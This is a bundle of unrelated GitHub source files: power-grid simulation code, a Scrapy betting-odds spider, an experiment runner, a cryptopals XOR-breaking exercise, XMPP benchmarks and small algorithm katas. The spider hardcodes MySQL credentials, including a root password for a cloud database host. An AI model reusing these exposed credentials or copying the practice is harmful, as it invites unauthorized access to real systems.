----------\n None\n\n \"\"\"\n self.comp_dict[line.name] = line\n self.comp_list.append(line)\n self.lines.append(line)\n self.lines = unique(self.lines)\n for discon in line.disconnectors:\n self.comp_dict[discon.name] = discon\n self.comp_list.append(discon)\n self.disconnectors.append(discon)\n self.disconnectors = unique(self.disconnectors)\n if line.circuitbreaker is not None:\n c_b = line.circuitbreaker\n self.comp_dict[c_b.name] = c_b\n self.comp_list.append(c_b)\n self.circuitbreakers.append(c_b)\n self.circuitbreakers = unique(self.circuitbreakers)\n self.comp_list = unique(self.comp_list)\n\n def add_lines(self, lines: list):\n \"\"\"\n Adding lines to the sub system\n\n Parameters\n ----------\n lines : list\n A list of Line elements in the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n for line in lines:\n self.add_line(line)\n\n def add_child_network(self, network):\n \"\"\"\n Adding child network to the sub system\n\n Parameters\n ----------\n network : PowerNetwork\n The child network of the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n self.child_network_list.append(network)\n\n def get_system_load_balance(self):\n \"\"\"\n Returns the load balance of the system\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n system_load_balance_p : float\n The active power load balance in the sub system (load - generation)\n system_load_balance_q : float\n The reactive power load balance in the sub system (load - generation)\n\n \"\"\"\n system_load_balance_p, system_load_balance_q = 0, 0\n for bus in self.buses:\n for child_network in self.child_network_list:\n if isinstance(child_network, Transmission):\n if bus == child_network.get_trafo_bus():\n system_load_balance_p = -INF\n system_load_balance_q = 0\n return system_load_balance_p, system_load_balance_q\n system_load_balance_p += bus.pload - bus.pprod\n system_load_balance_q += bus.qload - bus.qprod\n return system_load_balance_p, system_load_balance_q\n\n def update_batteries(self, fail_duration: Time, dt: Time):\n \"\"\"\n Updates the batteries in the sub system\n\n Parameters\n ----------\n fail_duration : Time\n The failure duration\n dt : Time\n The current time step\n\n Returns\n ----------\n None\n\n \"\"\"\n p, q = self.get_system_load_balance()\n for battery in self.batteries:\n p, q = battery.update(p, q, fail_duration, dt)\n\n def update_ev_parks(\n self,\n fail_duration: Time,\n dt: Time,\n start_time: TimeStamp,\n curr_time: Time,\n ):\n \"\"\"\n Updates the EV parks in the sub system\n\n Parameters\n ----------\n fail_duration : Time\n The failure duration\n dt : Time\n The current time step\n start_time : TimeStamp\n Start time\n curr_time : Time\n The current time\n\n Returns\n ----------\n None\n\n \"\"\"\n hour_of_day = start_time.get_hour_of_day(curr_time)\n p, q = self.get_system_load_balance()\n for ev_park in self.ev_parks:\n p, q = ev_park.update(\n p=p,\n q=q,\n fail_duration=fail_duration,\n dt=dt,\n hour_of_day=hour_of_day,\n )\n\n def reset_load_flow_data(self):\n \"\"\"\n Reset the variables used in the load flow analysis\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n None\n\n \"\"\"\n for bus in self.buses:\n bus.reset_load_flow_data()\n for line in self.lines:\n line.reset_load_flow_data()\n","repo_name":"stinefm/relsad","sub_path":"relsad/network/systems/SubSystem.py","file_name":"SubSystem.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} 
+{"seq_id":"18719126756","text":"import scrapy\nimport json\nimport arrow\nimport time\nfrom scrapy.selector import Selector\nfrom ..items import MatchItem\nfrom ..items import OuOddsItem\nfrom ..items import YaOddsItem\nfrom ..items import DxOddsItem\nfrom ..comm import funs\nfrom ..comm.MsDebug import MsLog\nfrom ..comm.OpData import OpData\n\n\nclass MasterSpider(scrapy.Spider):\n name = \"MasterSpider\"\n\n custom_settings = {\n\t\t'MYSQL_HOST': '192.168.1.19',\n 'MYSQL_USER': 'isoying',\n 'MYSQL_PASSWORD': 'isoying123',\n 'MYSQL_PORT': 3306,\n 'MYSQL_DB': 'zcdata',\n 'DOWNLOAD_DELAY': 0.35,\n 'ITEM_PIPELINES': {\n 'MsSpider.pipelines.pipelines.MsspiderPipeline': 300\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'MsSpider.middlewares.MsAgentMiddleware': 100,\n 'MsSpider.middlewares.MsHttpProxyMiddleware': 110,\n }\n }\n\n def __init__(self, params=None, *args, **kwargs):\n super(MasterSpider, self).__init__(*args, **kwargs)\n self.params = json.loads(params)\n # self.custom_settings['DOWNLOAD_DELAY'] = self.params['delay']\n\n def closed(self, reason):\n MsLog.debug('爬虫[MasterSpider]结束[{0}]-[{1}], Reason[{2}]'.format(self.params['sDate'], self.params['eDate'], reason))\n\n def start_requests(self):\n try:\n sDate = arrow.get(self.params['sDate'])\n eDate = arrow.get(self.params['eDate'])\n today = arrow.get(arrow.Arrow.now().format('YYYY-MM-DD'))\n MsLog.debug('[启动爬虫[MasterSpider]时间段[{0}]-[{1}]'.format(self.params['sDate'], self.params['eDate']))\n url = 'http://live.500.com/wanchang.php?e={0}'\n for day in arrow.Arrow.range('day', sDate, eDate.shift(days=-1)):\n if day >= today:\n print('时间超出范围{}'.format(day))\n break\n ssDate = day.format('YYYY-MM-DD')\n yield scrapy.Request(url=url.format(ssDate), callback=self.parseHistory, meta={'year': ssDate[:4]})\n except Exception as e:\n print('start_requests err:{0}'.format(e))\n\n def parseHistory(self, response):\n if response.status != 200:\n return\n datas = Selector(response).xpath('//tr[@gy and @yy]').extract()\n for data in datas:\n try:\n st = Selector(text=data)\n if not st:\n continue\n\n status = st.xpath('//span[@class=\"red\"]/text()').extract()[0]\n if not status:\n continue\n\n if status != '完':\n continue\n\n item = MatchItem()\n item['mid'] = st.xpath('//tr/@id').extract()[0][1:]\n item['lname'] = st.xpath('//td[@class=\"ssbox_01\"]/a/text()').extract()[0].replace(' ', '').replace(' ', '')\n item['mtname'] = st.xpath('//td[@class=\"p_lr01\" and @align=\"right\"]/a/span/text()').extract()[0].replace(' ', '')\n item['mtfname'] = ''\n item['dtname'] = st.xpath('//td[@class=\"p_lr01\" and @align=\"left\"]/a/span/text()').extract()[0].replace(' ', '')\n item['dtfname'] = ''\n\n # 提取比赛得分\n tmpNode = st.xpath('//div[@class=\"pk\"]/a/text()').extract()\n if len(tmpNode) >= 3:\n item['jq'] = funs.s2i(tmpNode[0]) # 进球数\n item['sq'] = funs.s2i(tmpNode[2]) # 失球数\n else:\n item['jq'] = 0\n item['sq'] = 0\n\n # 计算比赛时间\n tmpDate = st.xpath('//td[@align=\"center\"]/text()').extract()[1]\n if tmpDate:\n item['mdate'] = '{0}-{1}:00'.format(response.meta['year'], tmpDate)\n yield item\n except Exception as e:\n print('parseHistory err: {0}'.format(e))\n\n\nclass DatailSpider(scrapy.Spider):\n\n name = \"DatailSpider\"\n\n custom_settings = {\n # 'MYSQL_HOST': 'rm-m5eyk861d8408u3ix.mysql.rds.aliyuncs.com',\n 'MYSQL_HOST': 'rm-m5eyk861d8408u3ix1o.mysql.rds.aliyuncs.com',\n 'MYSQL_USER': 'root',\n 'MYSQL_PASSWORD': 'Tingxue_147258369',\n 'MYSQL_PORT': 3306,\n 'MYSQL_DB': 'zcdata',\n 'DOWNLOAD_DELAY': 0.35,\n 'ITEM_PIPELINES': {\n 
'MsSpider.pipelines.pipelines.MsspiderPipeline': 300\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'MsSpider.middlewares.MsAgentMiddleware': 100,\n 'MsSpider.middlewares.MsHttpProxyMiddleware': 110,\n }\n }\n\n def __init__(self, params=None, *args, **kwargs):\n super(DatailSpider, self).__init__(*args, **kwargs)\n self.params = json.loads(params)\n opdata = OpData(host=self.custom_settings['MYSQL_HOST'],\n user=self.custom_settings['MYSQL_USER'],\n pwd=self.custom_settings['MYSQL_PASSWORD'],\n database=self.custom_settings['MYSQL_DB'])\n # 这个SQL, 重新跑明细\n # sql = '''\n # select mid, mdate, 0 as ou, 0 as ya, 0 as dx\n # from matchdata\n # where oumid is null and a.mdate >= '{}' and a.mdate <= '{}'\n # '''.format(self.params['sDate'], self.params['eDate'])\n\n # 这个SQL,只抓取没有明细的比赛\n sql = '''\n select mid, mdate,\n case when oumid is null then 0 else 1 end as ou,\n case when yamid is null then 0 else 1 end as ya,\n case when dxmid is null then 0 else 1 end as dx\n from matchdata as a left join\n (\n select distinct mid as oumid from ouodds\n ) as b on a.mid = b.oumid left join\n (\n select distinct mid as yamid from yaodds\n ) as c on a.mid = c.yamid left join\n (\n select distinct mid as dxmid from dxodds\n ) as d on a.mid = d.dxmid\n where oumid is null and a.mdate >= '{}' and a.mdate <= '{}'\n '''.format(self.params['sDate'], self.params['eDate'])\n self.matchs = opdata.query(sql)\n\n def closed(self, reason):\n MsLog.debug('爬虫[DetailSpider]结束[{0}]-[{1}], Reason[{2}]'.format(self.params['sDate'], self.params['eDate'], reason))\n\n def start_requests(self):\n try:\n MsLog.debug('[启动爬虫[DatailSpider]')\n for data in self.matchs:\n MsLog.debug('mid:{} mdate:{} ou:{} ya:{} dx:{}'.format(data['mid'], data['mdate'], data['ou'], data['ya'], data['dx']))\n myear = arrow.get(data['mdate']).format('YYYY')\n if data['ou'] == 0:\n # 欧赔页面url\n url = 'http://odds.500.com/fenxi/ouzhi-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseOuOddsPages, meta={'mid': data['mid']})\n\n if data['ya'] == 0:\n # 亚赔页面url\n url = 'http://odds.500.com/fenxi/yazhi-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseYaOddsPages, meta={'year': myear, 'mid': data['mid']})\n\n if data['dx'] == 0:\n # 大小指数url\n url = 'http://odds.500.com/fenxi/daxiao-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseDxOddsPages, meta={'year': myear, 'mid': data['mid']})\n except Exception as e:\n print('start_requests err:{0}'.format(e))\n\n def parseOuOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/ouzhi.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0&chupan=1'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseOuOdds, meta={'mid': mid})\n\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseOuOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@ttl=\"zy\"]').extract()\n for data in datas:\n try:\n # 提取博彩公司名称\n st = Selector(text=data)\n bname = st.xpath('//td[@class=\"tb_plgs\"]/@title').extract()[0].replace(' ', '')\n\n cid = st.xpath('//tr/@id').extract()[0]\n ctime = st.xpath('//tr/@data-time').extract()[0]\n # 解析明细数据\n stimpstamp = 
int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/json/ouzhi.php?_={0}&fid={1}&cid={2}&r=1&time={3}&type=europe'.format(stimpstamp, mid, cid, ctime)\n yield scrapy.Request(url=url, callback=self.parseImmOuOdds, meta={'mid': mid, 'bname': bname})\n except:\n pass\n\n def parseImmOuOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n datas = json.loads(response.body)\n for data in datas:\n try:\n item = OuOddsItem()\n item['mid'] = mid\n item['bname'] = bname\n item['owin'] = funs.s2f(data[0])\n item['odraw'] = funs.s2f(data[1])\n item['olose'] = funs.s2f(data[2])\n item['retratio'] = funs.s2f(data[3])\n item['kwin'] = 0.0\n item['kdraw'] = 0.0\n item['klose'] = 0.0\n item['cdate'] = data[4]\n yield item\n except Exception as e:\n print('[parseOuOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseYaOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/yazhi.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseYaOdds, meta={'year': response.meta['year'], 'mid': mid})\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseYaOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@xls=\"row\"]').extract()\n for data in datas:\n try:\n st = Selector(text=data)\n # 提取博彩公司名称\n bname = st.xpath('//span[@class=\"quancheng\"]/text()').extract()[0]\n mmyid = st.xpath('//tr/@id').extract()[0]\n # 解析明细数据\n sTimpstamp = int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/inc/yazhiajax.php?fid={0}&id={1}&t={2}&r=1'.format(mid, mmyid, sTimpstamp)\n yield scrapy.Request(url=url, callback=self.parseImmYaOdds, headers={'X-Requested-With': 'XMLHttpRequest'}, meta={'year': response.meta['year'], 'mid': mid, 'bname': bname})\n except Exception as e:\n print(e)\n\n def parseImmYaOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n try:\n datas = json.loads(response.body)\n for data in datas:\n item = YaOddsItem()\n data = data.replace(' ', '')\n data = Selector(text=data).xpath('//td/text()').extract()\n item['mid'] = mid\n item['bname'] = bname\n item['odds1'] = funs.s2f(data[0])\n item['disc'] = data[1]\n item['odds2'] = funs.s2f(data[2])\n item['cdate'] = '{0}-{1}:00'.format(response.meta['year'], data[3])\n yield item\n except Exception as e:\n self.log('[parseImmYaOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseDxOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/daxiao.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseDxOdds, meta={'year': response.meta['year'], 'mid': mid})\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseDxOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@xls=\"row\"]').extract()\n for data in 
datas:\n try:\n st = Selector(text=data)\n\n # 提取博彩公司名称\n bname = st.xpath('//span[@class=\"quancheng\"]/text()').extract()[0]\n\n mmyid = st.xpath('//tr/@id').extract()[0]\n\n # 解析明细数据\n sTimpstamp = int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/inc/daxiaoajax.php?fid={0}&id={1}&t={2}'.format(mid, mmyid, sTimpstamp)\n yield scrapy.Request(url=url, callback=self.parseImmDxOdds, headers={'X-Requested-With': 'XMLHttpRequest'}, meta={'year': response.meta['year'], 'mid': mid, 'bname': bname})\n except Exception as e:\n self.log('[parseDxOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseImmDxOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n try:\n datas = json.loads(response.body)\n for data in datas:\n item = DxOddsItem()\n data = data.replace(' ', '')\n data = Selector(text=data).xpath('//td/text()').extract()\n item['mid'] = mid\n item['bname'] = bname\n item['odds1'] = funs.s2f(data[0])\n item['disc'] = data[1]\n item['odds2'] = funs.s2f(data[2])\n item['cdate'] = '{0}-{1}:00'.format(response.meta['year'], data[3])\n yield item\n except Exception as e:\n self.log('[parseImmDxOdds Error][{0}][{1}]'.format(mid, e))","repo_name":"mansoy/MsSpider","sub_path":"MsSpider/spiders/FixedSpider.py","file_name":"FixedSpider.py","file_ext":"py","file_size_in_byte":14913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27922950997","text":"import os\nimport random\n\nos.chdir(\"/home/wangzhaokang/wangyunpan/gnns-project/ogb_evaluations/exp\")\nfor data in ['mag', 'products']:\n for sampler in ['neighborsampling', 'cluster', 'graphsaint']:\n for alg in ['gcn', 'sage', 'gat', 'rgcn']:\n file_path = f\"{data}/{sampler}_{alg}.py\"\n if not os.path.exists(file_path):\n continue\n print(file_path)\n cmd = f\"python -u {file_path} --device {random.randint(0,1)} 1>log/{data}_{sampler}_{alg}.out 2>&1\"\n os.system(cmd)\n\n","repo_name":"AugF/ogb-evaluations","sub_path":"exp/log/run_baselines.py","file_name":"run_baselines.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17872096776","text":"from set1 import *\n\nwith open(\"6.txt\",\"r\") as f:\n\tdata = f.readlines()\ns = \"\".join(data).replace(\"\\n\",\"\")\ns = b64_to_hex(s)\n\n # contains keysize guess and avg hamming distance between two blocks\nhams = {}\n\n# keysizes need to be in multiples of two since we are reading hex\nfor size in range(4,82,2):\n\tnum_slices = len(s)//size\n\tscore = 0\n\titerations = 0\n\tfor i in range(num_slices-1):\n\t\tblock_1 = s[i*size:i*size+size]\n\t\tblock_2 = s[i*size+size:i*size+size*2]\n\t\t#print(f\"{block_1}, {block_2}, {ham_dist(block_1,block_2,'hex')/size}\")\n\t\tscore += ham_dist(block_1,block_2,\"hex\")/size\n\t\titerations += 1\n\thams[size//2] = score/iterations\n\n# keysizes sorted by shortest average hamming distance between two blocks\nsorted_hams = sorted(hams.items(), key=lambda x:(x[1],x[0]))\n# print(sorted_hams)\n\n# item[0] is keysize, item[1] is hamming dist\nfor item in sorted_hams[:3]:\n\ttest_blocks = data_to_blocks(s, int(item[0]))\n\t#print(test_blocks)\n\t\n\ttransposed_blocks = transpose_blocks(test_blocks)\n\t#print(transposed_blocks)\n\t\n\tprint(f\"Finding candidate key for keysize: {item[0]}\")\n\tkey = \"\"\n\tfor block in transposed_blocks:\n\t\tblock_len = len(block)\n\t\tkey+=find_xor_chr(block)[1]\n\n\tpkey = bytes.fromhex(key).decode(\"utf-8\")\n\tptext 
= bytes.fromhex(repeating_key_xor(s, key, \"hex\")).decode(\"utf-8\")\n\n\tprint(f\"key: {pkey}\\nplaintext: {ptext}\")\n\t\t\n\n","repo_name":"cckev/cryptopals","sub_path":"py/set1/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684347746","text":"########################################################################\n# File name: test_xml.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport base64\nimport io\nimport itertools\nimport unittest\nimport random\n\nimport aioxmpp.xso as xso\nimport aioxmpp.xml\n\nfrom aioxmpp.benchtest import times, timed, record\n\n\nclass ShallowRoot(xso.XSO):\n TAG = (\"uri:test\", \"shallow\")\n\n attr = xso.Attr(\"a\")\n data = xso.Text()\n\n def __init__(self, scale=1):\n super().__init__()\n self.attr = \"foobar\"*(2*scale)\n self.data = \"fnord\"*(10*scale)\n\n\nclass DeepLeaf(xso.XSO):\n TAG = (\"uri:test\", \"leaf\")\n\n data = xso.Text()\n\n def generate(self, rng, depth):\n self.data = \"foo\" * (2*rng.randint(1, 10))\n\n\nclass DeepNode(xso.XSO):\n TAG = (\"uri:test\", \"node\")\n\n data = xso.Attr(\"attr\")\n children = xso.ChildList([DeepLeaf])\n\n def generate(self, rng, depth):\n self.data = \"foo\" * (2*rng.randint(1, 10))\n if depth >= 5:\n cls = DeepLeaf\n else:\n cls = DeepNode\n\n self.children.append(cls())\n for i in range(rng.randint(2, 10)):\n if rng.randint(1, 10) == 1:\n item = DeepNode()\n else:\n item = DeepLeaf()\n self.children.append(item)\n\n for item in self.children:\n item.generate(rng, depth+1)\n\n\nDeepNode.register_child(DeepNode.children, DeepNode)\n\n\nclass DeepRoot(xso.XSO):\n TAG = (\"uri:test\", \"root\")\n\n children = xso.ChildList([DeepLeaf, DeepNode])\n\n def generate(self, rng):\n self.children[:] = [DeepNode() for i in range(3)]\n for child in self.children:\n child.generate(rng, 1)\n\n\nclass TestxmlValidateNameValue_str(unittest.TestCase):\n KEY = \"aioxmpp.xml\", \"xmlValidateNameValue\"\n\n def test_exhaustive(self):\n validate = aioxmpp.xml.xmlValidateNameValue_str\n\n r1 = range(0, 0xd800)\n r2 = range(0xe000, 0xf0000)\n\n range_iter = itertools.chain(\n # exclude surrogates\n r1, r2,\n )\n\n with timed() as timer:\n for cp in range_iter:\n validate(chr(cp))\n\n record(self.KEY + (\"exhaustive\",),\n timer.elapsed / (len(r1) + len(r2)),\n \"s\")\n\n def test_exhaustive_dualchar(self):\n validate = aioxmpp.xml.xmlValidateNameValue_str\n\n strs = [\"x\" + chr(cp) for cp in range(0, 0xd800)]\n\n with timed() as timer:\n for s in strs:\n validate(s)\n\n record(self.KEY + (\"exhaustive_dualchar\",),\n timer.elapsed / (len(strs)),\n \"s\")\n\n def test_random_strings(self):\n key = self.KEY + (\"random\",)\n\n validate = 
aioxmpp.xml.xmlValidateNameValue_str\n\n rng = random.Random(1)\n samples = []\n for i in range(1000):\n samples.append(base64.b64encode(\n random.getrandbits(120).to_bytes(120//8, 'little')\n ).decode(\"ascii\").rstrip(\"=\"))\n\n for sample in samples:\n with timed() as timer:\n validate(sample)\n record(key, timer.elapsed, \"s\")\n\n\nclass Testwrite_single_xso(unittest.TestCase):\n KEY = \"aioxmpp.xml\", \"write_single_xso\"\n\n @classmethod\n def setUpClass(cls):\n rng = random.Random(1)\n cls.deep_samples = [\n DeepRoot()\n for i in range(10)\n ]\n for sample in cls.deep_samples:\n with timed(cls.KEY+(\"deep\", \"generate\")):\n sample.generate(rng)\n\n def setUp(self):\n self.buf = io.BytesIO(bytearray(1024*1024))\n\n def _reset_buffer(self):\n self.buf.seek(0)\n\n @times(1000)\n def test_shallow_and_small(self):\n key = self.KEY + (\"shallow+small\",)\n item = ShallowRoot()\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n\n @times(1000)\n def test_shallow_and_large(self):\n key = self.KEY + (\"shallow+large\",)\n item = ShallowRoot(scale=100)\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n\n @times(1000, pass_iteration=True)\n def test_deep(self, iteration=None):\n key = self.KEY + (\"deep\",)\n item = self.deep_samples[iteration % len(self.deep_samples)]\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n","repo_name":"horazont/aioxmpp","sub_path":"benchmarks/test_xml.py","file_name":"test_xml.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"11047448502","text":"class PriorityQueue:\n def __init__(self):\n self.heap = []\n\n def parent_index(self, i):\n return (i - 1) // 2\n\n def left_child_index(self, i):\n return 2 * i + 1\n\n def right_child_index(self, i):\n return 2 * i + 2\n\n def enqueue(self, value, priority):\n self.heap.append({'value': value, 'priority': priority})\n i = len(self.heap) - 1\n while i > 0:\n parent_index = self.parent_index(i)\n if self.heap[i]['priority'] < self.heap[parent_index]['priority']:\n self.heap[i], self.heap[parent_index] = self.heap[parent_index], self.heap[i]\n i = parent_index\n else:\n return\n\n def dequeue(self):\n if len(self.heap) == 0:\n return None\n elif len(self.heap) == 1:\n return self.heap.pop()['value']\n else:\n min_val = self.heap[0]['value']\n self.heap[0] = self.heap.pop()\n i = 0\n self.shift_down(i, len(self.heap))\n return min_val\n\n def shift_down(self, i, n):\n smallest = i\n left = self.left_child_index(i)\n right = self.right_child_index(i)\n\n if left < n and self.heap[left]['priority'] < self.heap[smallest]['priority']:\n smallest = left\n\n if right < n and self.heap[right]['priority'] < self.heap[smallest]['priority']:\n smallest = right\n\n if smallest != i:\n self.heap[i], self.heap[smallest] = self.heap[smallest], self.heap[i]\n self.shift_down(smallest, n)\n\n def change_priority(self, heap, value, new_priority):\n for item in heap:\n if item['value'] == value:\n item['priority'] = new_priority\n heap.sort(key=lambda x: x['priority'])\n\n def 
level_order(self, heap):\n q = [0]\n list_str = ''\n while q:\n curr = q.pop(0)\n list_str += f\"{heap[curr]['value']}\\n\"\n left = self.left_child_index(curr)\n right = self.right_child_index(curr)\n\n if left < len(heap):\n q.append(left)\n\n if right < len(heap):\n q.append(right)\n\n print(list_str)\n\n def get_min(self):\n return self.heap[0]['value']\n\n\npq = PriorityQueue()\n\n# Priority Insertion\npq.enqueue(\"Task 1\", 2)\npq.enqueue(\"Task 2\", 1)\npq.enqueue(\"Task 3\", 2)\npq.enqueue(\"Task 4\", 1)\n\n# Priority Deletion\n# print(pq.dequeue()) # Task 2\n# print(pq.dequeue()) # Task 4\n# print(pq.dequeue()) # Task 1\n# print(pq.dequeue()) # Task 3\n\n# pq.level_order(pq.heap)\nprint(pq.get_min()) # Task 2\n\n# Change Priority Of heap\npq.change_priority(pq.heap, \"Task 3\", 4)\npq.change_priority(pq.heap, \"Task 2\", 1)\npq.change_priority(pq.heap, \"Task 1\", 2)\npq.change_priority(pq.heap, \"Task 4\", 3)\n\nprint(pq.heap) # [{'value': 'Task 2', 'priority': 1}, {'value': 'Task 1', 'priority': 2}, {'value\n","repo_name":"subashkj005/Data_Structure","sub_path":"Week 3/Heap/Priority Queue.py","file_name":"Priority Queue.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28178100012","text":"\"\"\"\r\n\r\n时间复杂度O(N),按书中所讲,3个素数因子3、5、7分为三个队列\r\nq3,q5,q7,其中最初存放3,5,7\r\n * 之后每次添加找到三个队列头中最小的数,起初为3,将3移出队列\r\nq3后,在q3添加3*3,在q5添加3*5,q7中添加3*7\r\n * 此时可知q3{3*3},q5{5,3*5},q7{7,3*7}\r\n * 下一轮找到最小数为5,重复上述步骤,将5从q5移出,添加5*5到\r\nq5,因为5*3已经添加过所以不需要添加到q3中\r\n * 将5*7添加到q7,结果q3{3*3},q5{3*5,5*5},q7{7,3*7,5*7}\r\n * 依次找到第k个数\r\n\"\"\"\r\n\r\nclass KthNumber:\r\n def findKth(self, k):\r\n\r\n queue3 = [3]\r\n queue5 = [5]\r\n queue7 = [7]\r\n count = 0\r\n\r\n while count < k:\r\n min_s = min(queue3[0], queue5[0], queue7[0])\r\n if min_s == queue3[0]:\r\n min_s = queue3.pop(0)\r\n queue3.append(min_s*3)\r\n queue5.append(min_s*5)\r\n elif min_s == queue5[0]:\r\n min_s = queue5.pop(0)\r\n queue5.append(min_s*5)\r\n else:\r\n min_s == queue7[0]\r\n min_s = queue7.pop(0)\r\n queue7.append(min_s*7)\r\n count += 1\r\n return min_s\r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"Math&Puzzles/7.7.py","file_name":"7.7.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25733629843","text":"'''\nYou need to return a string that displays a diamond shape on the screen using asterisk (\"*\")\ncharacters. Please see provided test cases for exact output format.\n\nThe shape that will be returned from print method resembles a diamond, where the number\nprovided as input represents the number of *’s printed on the middle line. The line above\nand below will be centered and will have 2 less *’s than the middle line. 
This reduction by\n2 *’s for each line continues until a line with a single * is printed at the top and bottom\nof the figure.\n\n\nReturn null if input is even number or negative (as it is not possible to print diamond\nwith even number or negative number).\n\nPlease see provided test case(s) for examples.\nPython Note\n\nSince print is a reserved word in Python, Python students must implement the diamond(n)\nmethod instead, and return None for invalid input.\nJS Note\n\nJS students, like Python ones, must implement the diamond(n) method, and return null for\ninvalid input.\n\nexpected = \" *\\n\"\nexpected += \"***\\n\"\nexpected += \" *\\n\"\ntest.assert_equals(diamond(3), expected)\n\n\n\n\ndef diamond(n):\n\n if n % 2 == 0 or n < 0:\n return None\n else:\n\n ln = 1\n lev = int( n / 2)\n mid = lev + 1\n for i in range(0, (lev * 2) + 1):\n\n if ln == lev + 1:\n for j in range(0,n):\n print(\"*\",end='')\n print(\"\")\n ln += 1\n\n elif ln == 1 or ln == (lev * 2) + 1:\n for j in range(0, lev):\n print(\" \", end='')\n print(\"*\")\n ln += 1\n\n else:\n\n diff = abs(mid - ln)\n\n\n for j in range(0,diff):\n print(\" \", end='')\n\n for j in range(0, n - (diff*2)):\n print(\"*\", end='')\n\n print(\"\")\n ln += 1\n\n'''\n\n\ndef diamond(n):\n out = ''\n\n # Invalid inputs\n if n % 2 == 0 or n < 0:\n return None\n\n # Valid input\n else:\n ln = 1\n mid = int(n / 2) + 1\n\n for i in range(0, n):\n\n # Case 1: Center row\n if ln == mid:\n\n for j in range(0, n):\n print(\"*\", end='')\n out += '*'\n\n print(\"\")\n out += '\\n'\n ln += 1\n\n # Case 2: Top/Bottom row\n elif ln == 1 or ln 